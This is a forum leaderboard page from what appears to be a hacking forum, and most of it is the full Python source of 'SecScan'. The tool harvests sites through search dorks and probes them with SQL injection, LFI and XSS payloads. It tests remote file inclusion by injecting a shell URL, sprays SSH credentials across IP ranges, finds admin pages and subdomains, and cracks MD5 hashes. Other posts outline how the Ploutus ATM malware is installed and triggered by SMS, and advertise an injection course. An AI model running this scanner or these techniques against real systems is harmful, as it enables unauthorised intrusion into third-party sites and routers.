Leaderboard
Popular Content
Showing content with the highest reputation on 03/25/14 in all areas
-
I just want to say: when someone posts or builds something useful, give them +REP, not just a Like. Yes, that often genuinely matters for a person's ego (especially if they sweated over something specific). And lately some really good tutorials and write-ups have been appearing; some of them need a bit of digging around, but still. A Like is fine when you agree with an idea already laid out, or you simply like that idea but it didn't give you much. Just saying. Closed!
2 points
-
SecScan is a multithreaded web-vulnerability scanner plus utilities for penetration testers: a compact web-app vulnerability scanner for the amateur pentester.

Features: SQLi, XSS, LFI, RFI scanning
Utilities: admin/login page finder, subdomain finder, online/offline MD5 cracker, router checker, local IP lookup
The stable version will cover: auto SQL injector (bound to SlowQL), fuzzer, port/OS scanner, MD5/SHA1 bruteforcer, MD5/SHA1 crypter

Known bugs:
- Still crashes during MD5 dictionary attacks on very long words.
- XSS sometimes gives false positives.

How to run: ./SecScan
Report bugs at: norske.drittsekk@gmail.com || digiopen55@gmail.com

Fixed issues & upgrades:
- Crash during LFI & XSS scans.
- More MD5 dictionary-cracking features and functions.
- More stable SQL scan mode.
- Can now search more than 20 pages (max is 90, to avoid cut-offs/CAPTCHA requests from the search engine).
- More search-engine choices. Default is still the Ask engine (Bing & Yahoo are fine; the Google API is not recommended).
- More stealthy: random user-agent generator.

Coming in the near future:
- SQL injector (bound to my other project, SlowQL)
- Offline MD5 bruteforcer
- SHA1 dictionary/brute-force cracker
- Hex viewer
- Proxy finder
- Proxified mode
- Heuristic port & OS scanner (similar to Nmap)

#!/usr/bin/env python
import re
import hashlib
import Queue
from random import choice
import threading
import time
import urllib2
import sys
import socket

try:
    import paramiko  # The Router option requires paramiko for ssh connections.
    PARAMIKO_IMPORTED = True
except ImportError:
    PARAMIKO_IMPORTED = False

USER_AGENT = [
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
    "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
    "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
]

option = ' '
vuln = 0
invuln = 0
np = 0
found = []


class Router(threading.Thread):
    """Checks for routers running ssh with the given User/Pass."""

    def __init__(self, queue, user, passw):
        if not PARAMIKO_IMPORTED:
            print 'You need paramiko.'
            print 'http://www.lag.net/paramiko/'
            sys.exit(1)
        threading.Thread.__init__(self)
        self.queue = queue
        self.user = user
        self.passw = passw

    def run(self):
        """Tries to connect to each Ip on port 22."""
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        while True:
            try:
                ip_add = self.queue.get(False)
            except Queue.Empty:
                break
            try:
                ssh.connect(ip_add, username=self.user, password=self.passw, timeout=10)
                ssh.close()
                print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw)
                write = open('Routers.txt', "a+")
                write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw))
                write.close()
                self.queue.task_done()
            except:
                print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw)
                self.queue.task_done()


class Ip:
    """Handles the Ip range creation."""

    def __init__(self):
        self.ip_range = []
        self.start_ip = raw_input('Start ip: ')
        self.end_ip = raw_input('End ip: ')
        self.user = raw_input('User: ')
        self.passw = raw_input('Password: ')
        self.iprange()

    def iprange(self):
        """Creates the list of Ip's from start_ip to end_ip."""
        queue = Queue.Queue()
        start = list(map(int, self.start_ip.split(".")))
        end = list(map(int, self.end_ip.split(".")))
        tmp = start  # tmp aliases start on purpose; incrementing start advances tmp too
        self.ip_range.append(self.start_ip)
        while tmp != end:
            start[3] += 1
            for i in (3, 2, 1):
                if tmp[i] == 256:
                    tmp[i] = 0
                    tmp[i - 1] += 1
            self.ip_range.append(".".join(map(str, tmp)))
        for add in self.ip_range:
            queue.put(add)
        for i in range(10):
            thread = Router(queue, self.user, self.passw)
            thread.setDaemon(True)
            thread.start()
        queue.join()


class Crawl:
    """Searches for dorks and grabs results."""

    def __init__(self):
        if option == '4':
            self.shell = str(raw_input('Shell location: '))
        self.dork = raw_input('Enter your dork: ')
        self.queue = Queue.Queue()
        self.pages = raw_input('How many pages(Max 20): ')
        self.qdork = urllib2.quote(self.dork)
        self.page = 1
        self.crawler()

    def crawler(self):
        """Crawls Ask.com for sites and sends them to the appropriate scan."""
        print '\nScanning Ask...'
        for i in range(int(self.pages)):
            host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
            req = urllib2.Request(host)
            req.add_header('User-Agent', choice(USER_AGENT))
            response = urllib2.urlopen(req)
            source = response.read()
            start = 0
            count = 1
            end = len(source)
            numlinks = source.count('_t" href', start, end)
            while count < numlinks:
                start = source.find('_t" href', start, end)
                end = source.find(' onmousedown="return pk', start, end)
                link = source[start + 10:end - 1].replace("amp;", "")
                self.queue.put(link)
                start = end
                end = len(source)
                count = count + 1
            self.page += 1
        if option == '1':
            for i in range(10):
                thread = ScanClass(self.queue)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()
        elif option == '2':
            for i in range(10):
                thread = LScanClass(self.queue)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()
        elif option == '3':
            for i in range(10):
                thread = XScanClass(self.queue)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()
        elif option == '4':
            for i in range(10):
                thread = RScanClass(self.queue, self.shell)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()


class ScanClass(threading.Thread):
    """Scans for Sql errors and outputs to file."""

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.schar = "'"
        self.file = 'sqli.txt'

    def run(self):
        """Scans each Url for Sql errors."""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln, invuln, np
                test = site + self.schar
                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    pass  # request failed; task_done is called once at the bottom of the loop
                else:
                    if re.findall("You have an error in your SQL syntax", data, re.I):
                        self.mysql(test)
                        vuln += 1
                    elif re.findall('mysql_fetch', data, re.I):
                        self.mysql(test)
                        vuln += 1
                    elif re.findall('JET Database Engine', data, re.I):
                        self.mssql(test)
                        vuln += 1
                    elif re.findall('Microsoft OLE DB Provider for', data, re.I):
                        self.mssql(test)
                        vuln += 1
                    else:
                        print test + ' <-- Not Vuln'
                        invuln += 1
            else:
                print site + ' <-- No Parameters'
                np += 1
            self.queue.task_done()

    def mysql(self, url):
        """Processes vuln sites into a text file and outputs to screen."""
        read = open(self.file, "a+").read()
        if url in read:
            print 'Dupe: ' + url
        else:
            print "MySql: " + url
            write = open(self.file, "a+")
            write.write('[SQLI]: ' + url + "\n")
            write.close()

    def mssql(self, url):
        """Processes vuln sites into a text file and outputs to screen."""
        read = open(self.file, "a+").read()
        if url in read:
            print 'Dupe: ' + url
        else:
            print "MsSql: " + url
            write = open(self.file, "a+")  # fixed: the prefix belongs in the line, not the filename
            write.write('[SQLI]: ' + url + "\n")
            write.close()


class LScanClass(threading.Thread):
    """Scans for Lfi errors and outputs to file."""

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.file = 'lfi.txt'
        self.queue = queue
        self.lchar = '../'

    def run(self):
        """Checks each Url for File Inclusion errors."""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                lsite = site.rsplit('=', 1)[0]
                if lsite[-1] != "=":
                    lsite = lsite + "="
                test = lsite + self.lchar
                global vuln, invuln, np
                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    pass  # request failed; task_done is called once at the bottom of the loop
                else:
                    if re.findall("failed to open stream: No such file or directory", data, re.I):
                        self.lfi(test)
                        vuln += 1
                    else:
                        print test + ' <-- Not Vuln'
                        invuln += 1
            else:
                print site + ' <-- No Parameters'
                np += 1
            self.queue.task_done()

    def lfi(self, url):
        """Processes vuln sites into a text file and outputs to screen."""
        read = open(self.file, "a+").read()
        if url in read:
            print 'Dupe: ' + url
        else:
            print "Lfi: " + url
            write = open(self.file, "a+")
            write.write('[LFI]: ' + url + "\n")
            write.close()


class XScanClass(threading.Thread):
    """Scans for Xss errors and outputs to file."""

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.xchar = """"><script>alert('xss')</script>"""
        self.file = 'xss.txt'

    def run(self):
        """Checks each Url for possible Xss."""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln, invuln, np
                xsite = site.rsplit('=', 1)[0]
                if xsite[-1] != "=":
                    xsite = xsite + "="
                test = xsite + self.xchar
                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    pass  # request failed; task_done is called once at the bottom of the loop
                else:
                    if re.findall("<script>alert('xss')</script>", data, re.I):
                        self.xss(test)
                        vuln += 1
                    else:
                        print test + ' <-- Not Vuln'
                        invuln += 1
            else:
                print site + ' <-- No Parameters'
                np += 1
            self.queue.task_done()

    def xss(self, url):
        """Processes vuln sites into a text file and outputs to screen."""
        read = open(self.file, "a+").read()
        if url in read:
            print 'Dupe: ' + url
        else:
            print "Xss: " + url
            write = open(self.file, "a+")
            write.write('[XSS]: ' + url + "\n")
            write.close()


class RScanClass(threading.Thread):
    """Scans for Rfi errors and outputs to file."""

    def __init__(self, queue, shell):
        threading.Thread.__init__(self)
        self.queue = queue
        self.file = 'rfi.txt'
        self.shell = shell

    def run(self):
        """Checks each Url for a Remote File Inclusion vulnerability."""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln, invuln, np
                rsite = site.rsplit('=', 1)[0]
                if rsite[-1] != "=":
                    rsite = rsite + "="
                link = rsite + self.shell + '?'
                try:
                    conn = urllib2.Request(link)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    pass  # request failed; task_done is called once at the bottom of the loop
                else:
                    if re.findall('uname -a', data, re.I):  # or change to whatever is definitely in your shell's output
                        self.rfi(link)
                        vuln += 1
                    else:
                        print link + ' <-- Not Vuln'
                        invuln += 1
            else:
                print site + ' <-- No Parameters'
                np += 1
            self.queue.task_done()

    def rfi(self, url):
        """Processes vuln sites into a text file and outputs to screen."""
        read = open(self.file, "a+").read()
        if url in read:
            print 'Dupe: ' + url
        else:
            print "Rfi: " + url
            write = open(self.file, "a+")
            write.write('[Rfi]: ' + url + "\n")
            write.close()


class Atest(threading.Thread):
    """Checks the given site for Admin Pages/Dirs."""

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        """Checks whether an Admin Page/Dir exists."""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            try:
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
                print site
                found.append(site)
                self.queue.task_done()
            except urllib2.URLError:
                self.queue.task_done()


def admin():
    """Create queue and threads for admin page scans."""
    print 'Need to include http:// and ending /\n'
    site = raw_input('Site: ')
    queue = Queue.Queue()
    dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/',
            'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/',
            'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php',
            'joomla/administrator', 'login.php', 'admin_area/admin.php', 'admin_area/login.php', 'siteadmin/login.php',
            'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html',
            'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php',
            'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php',
            'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html',
            'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html',
            'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php',
            'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php',
            'admin/admin_login.php', 'admin_login.php', 'administrator/account.php', 'administrator.php',
            'admin_area/admin.html', 'pages/admin/admin-login.php', 'admin/admin-login.php', 'admin-login.php',
            'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
            'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php',
            'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php',
            'admincontrol.php', 'admin/adminLogin.html', 'adminLogin.html', 'admin/adminLogin.html', 'home.html',
            'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php',
            'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html',
            'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html',
            'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html',
            'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html',
            'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html',
            'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php',
            'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php',
            'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php', 'adminarea/index.php',
            'adminarea/admin.php', 'adminarea/login.php', 'panel-administracion/index.php',
            'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php',
            'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php',
            'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php']
    for add in dirs:
        test = site + add
        queue.put(test)
    for i in range(20):
        thread = Atest(queue)
        thread.setDaemon(True)
        thread.start()
    queue.join()


def aprint():
    """Print results of the admin page scans."""
    print 'Search Finished\n'
    if len(found) == 0:
        print 'No pages found'
    else:
        for site in found:
            print 'Found: ' + site


class SDtest(threading.Thread):
    """Checks the given Domain for Sub Domains."""

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        """Checks whether a Sub Domain responds."""
        while True:
            try:
                domain = self.queue.get(False)
            except Queue.Empty:
                break
            try:
                site = 'http://' + domain
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
            except urllib2.URLError:
                self.queue.task_done()
            else:
                target = socket.gethostbyname(domain)
                print 'Found: ' + site + ' - ' + target
                self.queue.task_done()


def subd():
    """Create queue and threads for sub domain scans."""
    queue = Queue.Queue()
    site = raw_input('Domain: ')
    sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula",
           "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog",
           "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom",
           "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db",
           "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory",
           "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos",
           "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files",
           "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery",
           "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles",
           "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps",
           "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio",
           "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager",
           "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob",
           "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon",
           "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners",
           "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman",
           "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
           "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure",
           "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte",
           "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test",
           "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2",
           "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows",
           "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]
    for check in sub:
        test = check + '.' + site
        queue.put(test)
    for i in range(20):
        thread = SDtest(queue)
        thread.setDaemon(True)
        thread.start()
    queue.join()


class Cracker(threading.Thread):
    """Use a wordlist to try and brute the hash."""

    def __init__(self, queue, hashm):
        threading.Thread.__init__(self)
        self.queue = queue
        self.hashm = hashm

    def run(self):
        """Hash each word and check it against the hash."""
        while True:
            try:
                word = self.queue.get(False)
            except Queue.Empty:
                break
            tmp = hashlib.md5(word).hexdigest()
            if tmp == self.hashm:
                self.result(word)
            self.queue.task_done()

    def result(self, words):
        """Print the result if found."""
        print self.hashm + ' = ' + words


def word():
    """Create queue and threads for the hash crack."""
    queue = Queue.Queue()
    wordlist = raw_input('Wordlist: ')
    hashm = raw_input('Enter Md5 hash: ')
    read = open(wordlist)
    for words in read:
        words = words.replace("\n", "")
        queue.put(words)
    read.close()
    for i in range(5):
        thread = Cracker(queue, hashm)
        thread.setDaemon(True)
        thread.start()
    queue.join()


class OnlineCrack:
    """Use an online service to check for the hash."""

    def crack(self):
        """Connect and check the hash."""
        hashm = raw_input('Enter MD5 Hash: ')
        conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
        conn.add_header('User-Agent', choice(USER_AGENT))
        opener = urllib2.build_opener()
        data = opener.open(conn).read()
        if data == 'No results returned.':
            print '\n- Not found or not valid -'
        else:
            print '\n- %s -' % (data)


class Check:
    """Check your current IP address."""

    def grab(self):
        """Connect to the site and grab the IP."""
        site = 'http://www.tracemyip.org/'
        try:
            conn = urllib2.Request(site)
            conn.add_header('User-Agent', choice(USER_AGENT))
            opener = urllib2.build_opener()
            data = opener.open(conn).read()
            start = 0
            end = len(data)
            start = data.find('onClick="', start, end)
            end = data.find('size=', start, end)
            ip_add = data[start + 46:end - 2].strip()
            print '\nYour current Ip address is %s' % (ip_add)
        except urllib2.HTTPError:
            print 'Error connecting'


def output():
    """Outputs dork scan results to screen."""
    print '\n>> ' + str(vuln) + ' Vulnerable Sites Found'
    print '>> ' + str(invuln) + ' Sites Not Vulnerable'
    print '>> ' + str(np) + ' Sites Without Parameters'
    if option == '1':
        print '>> Output Saved To sqli.txt\n'
    elif option == '2':
        print '>> Output Saved To lfi.txt'
    elif option == '3':
        print '>> Output Saved To xss.txt'
    elif option == '4':
        print '>> Output Saved To rfi.txt'


def main():
    """Outputs the menu and gets input."""
    red = "\033[01;31m{0}\033[00m"
    quotes = ['\n{Happy Hacking, friends & foes} -- NorskeDrittsekk\n',
              '\n{What is the difference between an exploiter & a cryptographer? An exploiter has a lot of creativity} -- f0ny\n']
    print red.format('''
++++++++++++++++++++++++++++++++++
+  = Advance Web Apps Scanner =  +
+               by               +
+      Black Tiger Security      +
+         now available          +
+           in public            +
++++++++++++++++++++++++++++++++++

Please choose one of these options below (enter numbers only):

=== Scanners:
[[READ: you don't have to enter inurl, just stuff like index.php?id= or .aspx?id=]]
[1] SQLi
[2] LFI
[3] XSS
[4] RFI

=== Other Tools:
[5] Route Checker
[6] Admin Page Finder
[7] Sub Domain Scan
[8] Dic MD5 cracker
[9] Online/Rainbow MD5 cracker
[10] Check local IP address
''')
    global option
    option = raw_input('Enter Option: ')
    if option:
        if option in ('1', '2', '3', '4'):
            Crawl()
            output()
            print red.format(choice(quotes))
        elif option == '5':
            Ip()
            print red.format(choice(quotes))
        elif option == '6':
            admin()
            aprint()
            print red.format(choice(quotes))
        elif option == '7':
            subd()
            print red.format(choice(quotes))
        elif option == '8':
            word()
            print red.format(choice(quotes))
        elif option == '9':
            OnlineCrack().crack()
            print red.format(choice(quotes))
        elif option == '10':
            Check().grab()
            print red.format(choice(quotes))
        else:
            print '\nInvalid Choice\n'
            time.sleep(0.9)
            main()
    else:
        print '\nYou Must Enter An Option\n'
        time.sleep(0.9)
        main()


if __name__ == '__main__':
    main()

Download: http://secscan-py.googlecode.com/files/SecScan-v1.1b
Source
1 point
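The script's dictionary cracker (the `Cracker` class plus `word()`) is the classic Python 2 worker-thread-plus-`Queue` pattern. A minimal Python 3 sketch of the same idea, not taken from the SecScan source (function name and wordlist are made up for illustration):

```python
import hashlib
import queue
import threading


def crack_md5(target_hash, words, workers=4):
    """Try every candidate word; return the one whose MD5 matches, else None."""
    q = queue.Queue()
    for w in words:
        q.put(w)
    result = []  # appended to by whichever worker finds the match

    def worker():
        while True:
            try:
                word = q.get_nowait()
            except queue.Empty:
                return
            # Hash the candidate and compare against the target hex digest.
            if hashlib.md5(word.encode()).hexdigest() == target_hash:
                result.append(word)
            q.task_done()  # exactly one task_done per retrieved item

    threads = [threading.Thread(target=worker, daemon=True) for _ in range(workers)]
    for t in threads:
        t.start()
    q.join()  # blocks until every queued word has been processed
    return result[0] if result else None


if __name__ == '__main__':
    target = hashlib.md5(b'secret').hexdigest()
    print(crack_md5(target, ['password', 'letmein', 'secret']))  # secret
```

Note the single `task_done()` per item at the bottom of the worker loop; calling it in both an `except` branch and again afterwards (as some of the original scan classes do) makes `join()` return before the queue is actually drained.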
-
Since when do you allow yourself to claim the project was made by Reckon and by "Corex", meaning you? Reckon didn't give you permission to do that, and he never worked with you on it; you'd have to be pretty shameless to write that. "XPACH SQL Injection"? It's XPATH, not XPACH, for crying out loud.
1 point
-
As we reported earlier, Microsoft will stop supporting the Windows XP operating system after 8th April; apparently 95% of the world's 3 million ATMs run on it. Microsoft's decision to withdraw support for Windows XP poses a critical security threat to economic infrastructure worldwide.

MORE REASONS TO UPGRADE
Security researchers at antivirus firm Symantec claim that hackers can exploit a weakness in Windows XP based ATMs that allows them to withdraw cash simply by sending an SMS to compromised machines. "What was interesting about this variant of Ploutus was that it allowed cybercriminals to simply send an SMS to the compromised ATM, then walk up and collect the dispensed cash. It may seem incredible, but this technique is being used in a number of places across the world at this time," researchers said.

HARDWIRED MALWARE FOR ATMs
According to the researchers, in 2013 they detected a malware named Backdoor.Ploutus installed on ATMs in Mexico, designed to rob a certain type of standalone ATM with just text messages. To install the malware, the hacker must connect the ATM to a mobile phone via USB tethering and then initiate a shared Internet connection, which can then be used to send specific SMS commands to the phone attached or hardwired inside the ATM. https://www.youtube.com/watch?v=53vjNDV4RAY "Since the phone is connected to the ATM through the USB port, the phone also draws power from the connection, which charges the phone battery. As a result, the phone will remain powered up indefinitely."

HOW THE ATM HACK WORKS
- Connect a mobile phone to the machine with a USB cable and install the Ploutus malware.
- The attacker sends two SMS messages to the mobile phone inside the ATM: SMS 1 contains a valid activation ID to activate the malware; SMS 2 contains a valid dispense command to get the money out.
- The phone attached inside the ATM detects the valid incoming SMS messages and forwards them to the ATM as TCP or UDP packets.
- A network packet monitor (NPM) module coded into the malware receives the TCP/UDP packet and, if it contains a valid command, executes Ploutus. The amount for the cash withdrawal is pre-configured inside the malware.
- Finally, the hacker collects the cash from the hacked ATM.

Researchers have detected a few more advanced variants of this malware: some attempt to steal customer card and PIN data, while others attempt man-in-the-middle attacks. This malware is now spreading to other countries, so you are advised to pay extra attention and remain cautious while using an ATM. Source
1 point
-
About two months ago I started taking part in CTFs with them. I cover the web part.
1 point
-
1 point
-
I managed to put something together; I just hope you can adapt it to what you need. Note that loading a page with wx.html2.WebView takes a few seconds, and the WebView implementation also depends on the operating system:
- On Windows it uses the IE DLLs
- On Linux it uses WebKitGTK+
- On macOS it uses the OS X WebKit

Here is a small test example (it probably has a couple of errors, plus you get a main loop and so on). To instantiate the WebView you need a parent frame to hold it, but you are not obliged to actually show it (as I do here). The output of self.brsr.GetPageText() is a plain string, and you can run any operation on it.

import wx
import wx.html2


class Example(wx.Frame):
    def __init__(self, *args, **kw):
        super(Example, self).__init__(*args, **kw)
        self.InitUI()

    def InitUI(self):
        self.brsr = wx.html2.WebView.New(self)
        self.brsr.LoadURL('http://www.auction.com/search?search=deltona+fl&auction_type=residential')
        self.Bind(wx.html2.EVT_WEBVIEW_LOADED, self.OnLoaded)

    def OnLoaded(self, e):
        if not self.brsr or self.brsr.IsBusy():
            return
        print self.brsr.GetPageText()


def main():
    ex = wx.App()
    Example(None)
    ex.MainLoop()


if __name__ == '__main__':
    main()
1 point
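Since GetPageText() just hands back a string, everything after that is ordinary text processing. If the target page does not need JavaScript rendering, a non-GUI alternative is to fetch the HTML yourself and strip the markup; a sketch using Python 3's stdlib html.parser (not part of the posted wx example; the class and function names here are made up):

```python
from html.parser import HTMLParser


class TextExtractor(HTMLParser):
    """Collects text nodes, skipping the contents of <script> and <style>."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0  # depth counter for script/style nesting

    def handle_starttag(self, tag, attrs):
        if tag in ('script', 'style'):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ('script', 'style') and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        # Keep only non-blank text that is outside script/style blocks.
        if not self._skip and data.strip():
            self.parts.append(data.strip())


def page_text(html):
    """Return the visible text of an HTML document as one string."""
    parser = TextExtractor()
    parser.feed(html)
    return ' '.join(parser.parts)


if __name__ == '__main__':
    print(page_text('<html><head><script>var x=1;</script></head>'
                    '<body><p>Hello <b>world</b></p></body></html>'))  # Hello world
```

This avoids the few-second WebView load the post mentions, at the cost of not executing any JavaScript on the page.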
-
[RST] Post Hunter is an application that lets you "peek" at what's happening on RST while you're working on a project or programming and don't have time to (or don't want to) interrupt your work. The application checks the latest RST posts every minute, and when a new post/comment appears it creates a balloon tip. The balloon tip stays on screen for 4 seconds. Clicking it takes you to that post/comment, depending on the settings you choose in the application. Click the gear icon to configure it!

//UPDATE: Settings are saved in the registry. Avoid selecting too many categories.

Download: https://www.dropbox.com/s/xs8vwmj8w62mk2v/%5BRST%5D%20Post%20Hunter.rar

Please report any programming errors. I hope you find it useful.
// The application is built in .NET, targeting Framework 2.0. 3/21/2014
Post Hunter source (pass "hunter"): https://www.dropbox.com/s/bnhd641yovspf3h/RST%20Post%20Hunter%202.rar
1 point
-
@Maximus I'm not going to post anything anyway; I've had enough of him and the language he uses. Apart from a few ironic but on-point remarks, I said nothing more to him. He got all shaken up like a bottle of Pepsi, probably because I hurt his hacker ego :)), and started talking dirty too. What he's doing, and the nonsense he's capable of saying, is ridiculous. But if he keeps claiming the conversation shows I'm a child, why doesn't he post it? I backed up everything I said.
-1 points
-
Foreword
The initiator of this project is Reckon, with his site pentest-academy.com. After his site shut down, he made the scripts public and I decided to reopen it myself. He never published the XSS part, so I had to rebuild it from scratch; although it is not yet entirely finished, I figured it is useful as far as it goes, and I will update it as I finish each new level.

What stages you go through for SQL injection
For SQL injection there are 4 course levels with 4 exams. After each completed lesson there is an exam; on passing it, you are added to the HOF in the category of the exam you passed.

What stages you go through for Cross Site Scripting
For Cross Site Scripting there are also 4 stages; for now there are no exams, but I will add them along the way. Here you will learn methods of getting past filters, what the code behind looks like, and how to recognize an XSS.

SQL INJECTION COURSES
SQL INJECTION LEVEL 1: UNION BASED
SQL INJECTION LEVEL 2: ERROR BASED
SQL INJECTION LEVEL 3: DOUBLE QUERY
SQL INJECTION LEVEL 4: XPATH INJECTION

XSS (CROSS SITE SCRIPTING) COURSES
XSS (CROSS SITE SCRIPTING) LEVEL 1
XSS (CROSS SITE SCRIPTING) LEVEL 2
XSS (CROSS SITE SCRIPTING) LEVEL 3
XSS (CROSS SITE SCRIPTING) LEVEL 4

Project by Reckon & Corex
-1 points